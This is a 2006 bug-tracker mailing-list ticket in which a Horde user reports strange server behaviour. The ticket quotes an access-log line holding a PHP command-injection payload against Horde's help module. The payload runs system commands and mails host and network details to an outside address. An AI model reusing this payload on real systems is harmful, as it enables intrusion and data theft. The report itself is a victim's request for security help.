[Tickets #4141] NEW: Possible exploit?
bugs@bugs.horde.org
bugs at bugs.horde.org
Sun Jul 9 22:25:02 PDT 2006
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/?id=4141
-----------------------------------------------------------------------
Ticket | 4141
Created By | john at hertell.nu
Summary | Possible exploit?
Queue | Horde.org Servers
State | Unconfirmed
Priority | 1. Low
Type | Bug
Owners |
-----------------------------------------------------------------------
john at hertell.nu (2006-07-09 22:25) wrote:
I do not know where to post this. But my site have acted strange
sometimes. and I have a fully patched mandriva 2006.0 system so I hope
that also my horde is 100% up to date (if they sent out the updates for
horde in the updates I update my system often)
anyways..
I have found several lines like this in my log:
222.122.6.124 - - [09/Jul/2006:10:09:10 +0200] "GET
//horde//services/help/?show=about&module=;%22.passthru(%22w%20%3E%3E%20out;uname%20-a%20%3E%3E%20out;%22.chr(47).%22sbin%22.chr(47).%22ifconfig%20%7C%20grep%20inet%20%3E%3E%20out;cat%20out%20%7Cmail%20-s%20hacked%20lilkim at undernet.ro%22);'.
HTTP/1.1" 200 1158
and perl takes a LOT of cpu.. guess this is able to get a script and run
it..
More information about the bugs
mailing list